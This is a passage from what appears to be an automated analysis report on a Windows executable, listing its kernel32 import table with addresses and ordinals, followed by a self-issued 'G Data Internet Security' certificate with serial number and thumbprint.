| LoadLibraryA | 0x0 | 0x412138 | 0x59158 | 0x58158 | 0x33c |
| QueryDosDeviceW | 0x0 | 0x41213c | 0x5915c | 0x5815c | 0x3a0 |
| RaiseException | 0x0 | 0x412140 | 0x59160 | 0x58160 | 0x3b1 |
| GetExitCodeProcess | 0x0 | 0x412144 | 0x59164 | 0x58164 | 0x1df |
| GetModuleHandleW | 0x0 | 0x412148 | 0x59168 | 0x58168 | 0x218 |
| GetVersionExW | 0x0 | 0x41214c | 0x5916c | 0x5816c | 0x2a4 |
| FindResourceExW | 0x0 | 0x412150 | 0x59170 | 0x58170 | 0x14d |
| MultiByteToWideChar | 0x0 | 0x412154 | 0x59174 | 0x58174 | 0x367 |
| GetVersion | 0x0 | 0x412158 | 0x59178 | 0x58178 | 0x2a2 |
| GetCurrentProcess | 0x0 | 0x41215c | 0x5917c | 0x5817c | 0x1c0 |
| LocalFree | 0x0 | 0x412160 | 0x59180 | 0x58180 | 0x348 |
| GetModuleFileNameW | 0x0 | 0x412164 | 0x59184 | 0x58184 | 0x214 |
| FreeConsole | 0x0 | 0x412168 | 0x59188 | 0x58188 | 0x15f |
| GetCurrentProcessId | 0x0 | 0x41216c | 0x5918c | 0x5818c | 0x1c1 |
| CreateRemoteThread | 0x0 | 0x412170 | 0x59190 | 0x58190 | 0xa9 |
| CreateMutexW | 0x0 | 0x412174 | 0x59194 | 0x58194 | 0x9e |
| Sleep | 0x0 | 0x412178 | 0x59198 | 0x58198 | 0x4b2 |
| LoadLibraryW | 0x0 | 0x41217c | 0x5919c | 0x5819c | 0x33f |
| ReadFile | 0x0 | 0x412180 | 0x591a0 | 0x581a0 | 0x3c0 |
| CreateFileW | 0x0 | 0x412184 | 0x591a4 | 0x581a4 | 0x8f |
| LocalAlloc | 0x0 | 0x412188 | 0x591a8 | 0x581a8 | 0x344 |
| InitializeCriticalSection | 0x0 | 0x41218c | 0x591ac | 0x581ac | 0x2e2 |
| FreeLibrary | 0x0 | 0x412190 | 0x591b0 | 0x581b0 | 0x162 |
| DeleteCriticalSection | 0x0 | 0x412194 | 0x591b4 | 0x581b4 | 0xd1 |
| GetDriveTypeW | 0x0 | 0x412198 | 0x591b8 | 0x581b8 | 0x1d3 |
| CreateDirectoryW | 0x0 | 0x41219c | 0x591bc | 0x581bc | 0x81 |
| CreateProcessW | 0x0 | 0x4121a0 | 0x591c0 | 0x581c0 | 0xa8 |
| SetLastError | 0x0 | 0x4121a4 | 0x591c4 | 0x581c4 | 0x473 |
| GetWindowsDirectoryW | 0x0 | 0x4121a8 | 0x591c8 | 0x581c8 | 0x2af |
| WideCharToMultiByte | 0x0 | 0x4121ac | 0x591cc | 0x581cc | 0x511 |
| GetTickCount | 0x0 | 0x4121b0 | 0x591d0 | 0x581d0 | 0x293 |
| GetTempPathW | 0x0 | 0x4121b4 | 0x591d4 | 0x581d4 | 0x285 |
| GetTimeZoneInformation | 0x0 | 0x4121b8 | 0x591d8 | 0x581d8 | 0x298 |
| GetSystemInfo | 0x0 | 0x4121bc | 0x591dc | 0x581dc | 0x273 |
| GetPrivateProfileStringW | 0x0 | 0x4121c0 | 0x591e0 | 0x581e0 | 0x242 |
| GetSystemTimeAsFileTime | 0x0 | 0x4121c4 | 0x591e4 | 0x581e4 | 0x279 |
| GetDiskFreeSpaceExW | 0x0 | 0x4121c8 | 0x591e8 | 0x581e8 | 0x1ce |
| GetFileSize | 0x0 | 0x4121cc | 0x591ec | 0x581ec | 0x1f0 |
| GetUserDefaultUILanguage | 0x0 | 0x4121d0 | 0x591f0 | 0x581f0 | 0x29e |
| GetTempFileNameW | 0x0 | 0x4121d4 | 0x591f4 | 0x581f4 | 0x283 |
| CopyFileW | 0x0 | 0x4121d8 | 0x591f8 | 0x581f8 | 0x75 |
| WriteFile | 0x0 | 0x4121dc | 0x591fc | 0x581fc | 0x525 |
| lstrcpyW | 0x0 | 0x4121e0 | 0x59200 | 0x58200 | 0x548 |
| GetFileAttributesW | 0x0 | 0x4121e4 | 0x59204 | 0x58204 | 0x1ea |
| MoveFileExW | 0x0 | 0x4121e8 | 0x59208 | 0x58208 | 0x360 |
| DeviceIoControl | 0x0 | 0x4121ec | 0x5920c | 0x5820c | 0xdd |
| FindNextFileW | 0x0 | 0x4121f0 | 0x59210 | 0x58210 | 0x145 |
| lstrcmpiW | 0x0 | 0x4121f4 | 0x59214 | 0x58214 | 0x545 |
| GetLocaleInfoW | 0x0 | 0x4121f8 | 0x59218 | 0x58218 | 0x206 |
| lstrcmpW | 0x0 | 0x4121fc | 0x5921c | 0x5821c | 0x542 |
| LoadLibraryExW | 0x0 | 0x412200 | 0x59220 | 0x58220 | 0x33e |
| GetACP | 0x0 | 0x412204 | 0x59224 | 0x58224 | 0x168 |
| SetEvent | 0x0 | 0x412208 | 0x59228 | 0x58228 | 0x459 |
| ExitProcess | 0x0 | 0x41220c | 0x5922c | 0x5822c | 0x119 |
| CreateThread | 0x0 | 0x412210 | 0x59230 | 0x58230 | 0xb5 |
| GetModuleFileNameA | 0x0 | 0x412214 | 0x59234 | 0x58234 | 0x213 |
| TerminateThread | 0x0 | 0x412218 | 0x59238 | 0x58238 | 0x4c1 |
| GlobalFindAtomW | 0x0 | 0x41221c | 0x5923c | 0x5823c | 0x2b7 |
| TerminateProcess | 0x0 | 0x412220 | 0x59240 | 0x58240 | 0x4c0 |
| OpenMutexW | 0x0 | 0x412224 | 0x59244 | 0x58244 | 0x37d |
| SetErrorMode | 0x0 | 0x412228 | 0x59248 | 0x58248 | 0x458 |
| GetSystemTime | 0x0 | 0x41222c | 0x5924c | 0x5824c | 0x277 |
| SystemTimeToFileTime | 0x0 | 0x412230 | 0x59250 | 0x58250 | 0x4bd |
| WaitForMultipleObjects | 0x0 | 0x412234 | 0x59254 | 0x58254 | 0x4f7 |
| ResetEvent | 0x0 | 0x412238 | 0x59258 | 0x58258 | 0x40f |
| CreateEventA | 0x0 | 0x41223c | 0x5925c | 0x5825c | 0x82 |
| GetSystemWindowsDirectoryW | 0x0 | 0x412240 | 0x59260 | 0x58260 | 0x27c |
| GetVolumeInformationW | 0x0 | 0x412244 | 0x59264 | 0x58264 | 0x2a7 |
| VirtualFree | 0x0 | 0x412248 | 0x59268 | 0x58268 | 0x4ec |
| VirtualAlloc | 0x0 | 0x41224c | 0x5926c | 0x5826c | 0x4e9 |
| ReleaseSemaphore | 0x0 | 0x412250 | 0x59270 | 0x58270 | 0x3fe |
| HeapFree | 0x0 | 0x412254 | 0x59274 | 0x58274 | 0x2cf |
| GetProcessHeap | 0x0 | 0x412258 | 0x59278 | 0x58278 | 0x24a |
| HeapAlloc | 0x0 | 0x41225c | 0x5927c | 0x5827c | 0x2cb |
| IsProcessorFeaturePresent | 0x0 | 0x412260 | 0x59280 | 0x58280 | 0x304 |
| HeapDestroy | 0x0 | 0x412264 | 0x59284 | 0x58284 | 0x2ce |
| HeapReAlloc | 0x0 | 0x412268 | 0x59288 | 0x58288 | 0x2d2 |
| HeapSize | 0x0 | 0x41226c | 0x5928c | 0x5828c | 0x2d4 |
| LocalFileTimeToFileTime | 0x0 | 0x412270 | 0x59290 | 0x58290 | 0x346 |
| SetFilePointerEx | 0x0 | 0x412274 | 0x59294 | 0x58294 | 0x467 |
| GetFileSizeEx | 0x0 | 0x412278 | 0x59298 | 0x58298 | 0x1f1 |
| OutputDebugStringW | 0x0 | 0x41227c | 0x5929c | 0x5829c | 0x38a |
| FormatMessageW | 0x0 | 0x412280 | 0x592a0 | 0x582a0 | 0x15e |
| TlsGetValue | 0x0 | 0x412284 | 0x592a4 | 0x582a4 | 0x4c7 |
| TlsSetValue | 0x0 | 0x412288 | 0x592a8 | 0x582a8 | 0x4c8 |
| GetAtomNameW | 0x0 | 0x41228c | 0x592ac | 0x582ac | 0x16e |
| OpenThread | 0x0 | 0x412290 | 0x592b0 | 0x582b0 | 0x385 |
| AddAtomW | 0x0 | 0x412294 | 0x592b4 | 0x582b4 | 0x4 |
| TlsAlloc | 0x0 | 0x412298 | 0x592b8 | 0x582b8 | 0x4c5 |
| FindAtomW | 0x0 | 0x41229c | 0x592bc | 0x582bc | 0x12d |
| DeleteAtom | 0x0 | 0x4122a0 | 0x592c0 | 0x582c0 | 0xcf |
| TlsFree | 0x0 | 0x4122a4 | 0x592c4 | 0x582c4 | 0x4c6 |
| UnhandledExceptionFilter | 0x0 | 0x4122a8 | 0x592c8 | 0x582c8 | 0x4d3 |
| SetUnhandledExceptionFilter | 0x0 | 0x4122ac | 0x592cc | 0x582cc | 0x4a5 |
| GlobalMemoryStatusEx | 0x0 | 0x4122b0 | 0x592d0 | 0x582d0 | 0x2c0 |
| GetStartupInfoW | 0x0 | 0x4122b4 | 0x592d4 | 0x582d4 | 0x263 |
| GetCPInfo | 0x0 | 0x4122b8 | 0x592d8 | 0x582d8 | 0x172 |
| LCMapStringA | 0x0 | 0x4122bc | 0x592dc | 0x582dc | 0x32b |
| LCMapStringW | 0x0 | 0x4122c0 | 0x592e0 | 0x582e0 | 0x32d |
| GetStringTypeW | 0x0 | 0x4122c4 | 0x592e4 | 0x582e4 | 0x269 |
| HeapCreate | 0x0 | 0x4122c8 | 0x592e8 | 0x582e8 | 0x2cd |
| GetOEMCP | 0x0 | 0x4122cc | 0x592ec | 0x582ec | 0x237 |
| IsValidCodePage | 0x0 | 0x4122d0 | 0x592f0 | 0x582f0 | 0x30a |
Digital Signatures (1)
»
Certificate: G Data Internet Security
»
| Issued by | G Data Internet Security |
| Country Name | - |
| Valid From | 2019-02-06 13:56:58+00:00 |
| Valid Until | 2039-12-31 23:59:59+00:00 |
| Algorithm | sha512_rsa |
| Serial Number | -7 98 95 FC 32 3E 03 65 B8 2F B5 38 6A 56 90 72 |
| Thumbprint | 93 EF 47 2D 18 5A 41 41 BE D7 B1 68 44 E1 F2 A7 AA 0E 1B A6 |
